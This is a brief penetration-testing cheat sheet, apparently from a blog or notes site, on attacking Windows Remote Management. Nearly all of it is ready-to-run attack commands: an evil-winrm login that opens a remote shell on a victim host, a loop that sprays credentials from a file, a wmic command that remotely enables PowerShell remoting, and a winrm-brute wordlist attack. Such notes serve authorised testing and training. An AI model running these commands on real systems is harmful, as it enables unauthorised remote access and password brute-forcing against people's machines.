Windows Remote Management (WinRM / wsman) is a service which runs on port 5985 and 5986.
Evil Winrm
Github | Opens a shell for a user
root@kali:~# evil-winrm -i $victim -u melanie -p 'Welcome123!'
For many users:
for cred in $(cat user_pass.txt); do username=$(echo $cred | cut -d ',' -f 1) password=$(echo $cred | cut -d ',' -f 2) echo "$username / $password" evil-winrm -i $victim -u $username -p '$password' done;
Commands:
- upload local remote
- download remote local
- services
- menu
Activate from a shell
From a shell, WinRM can be activated:
wmic /node:<REMOTE_HOST> process call create "powershell enable-psremoting -force"
Brute force
WinRM brute can brute force WinRM.
bundle exec ./winrm-brute.rb -u nathen -P /root/p141.general.1/0270-worker/enum/cewl-words-from-cartoon-site.txt $victim
Leave a Reply
You must be logged in to post a comment.